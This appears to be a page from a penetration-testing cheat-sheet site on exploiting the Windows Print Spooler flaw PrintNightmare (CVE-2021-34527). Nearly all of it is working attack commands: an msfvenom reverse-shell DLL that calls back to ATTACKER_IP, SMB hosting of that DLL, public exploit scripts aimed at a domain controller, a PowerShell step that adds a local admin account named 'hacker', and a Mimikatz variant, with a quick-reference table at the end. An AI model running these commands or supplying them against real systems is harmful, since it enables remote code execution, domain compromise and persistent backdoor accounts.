> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# PrintNightmare

> PrintNightmare (CVE-2021-34527): remote code execution via Windows Print Spooler vulnerability.

## Overview

CVE-2021-34527. Load malicious DLL via Print Spooler service. Variants: RCE (remote) and LPE (local privilege escalation).

***

## Check Spooler Running

```bash theme={"dark"}
impacket-rpcdump DC_IP | grep -i "spoolsv\|MS-RPRN"
```

```powershell theme={"dark"}
Get-Service Spooler
ls \\DC_IP\pipe\spoolss
```

***

## RCE — Remote

### Host DLL

```bash theme={"dark"}
# Generate DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# Host via SMB
impacket-smbserver share . -smb2support
```

### Exploit

```bash theme={"dark"}
# https://github.com/cube0x0/CVE-2021-1675
python3 CVE-2021-1675.py DOMAIN/user:password@DC_IP '\\ATTACKER_IP\share\evil.dll'
```

***

## LPE — Local Privilege Escalation

```powershell theme={"dark"}
# https://github.com/calebstewart/CVE-2021-1675
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -DriverName "PrintMe" -NewUser "hacker" -NewPassword "Password123!"
```

Adds local admin user.

***

## Mimikatz Method

```cmd theme={"dark"}
misc::printnightmare /server:DC_IP /library:\\ATTACKER_IP\share\evil.dll
```

***

## Quick Reference

| Task          | Command                                                       |
| ------------- | ------------------------------------------------------------- |
| Check spooler | `rpcdump DC_IP \| grep spoolsv`                               |
| RCE           | `CVE-2021-1675.py DOMAIN/user:pass@DC '\\ATK\share\evil.dll'` |
| LPE           | `Invoke-Nightmare -NewUser hacker -NewPassword Pass123!`      |
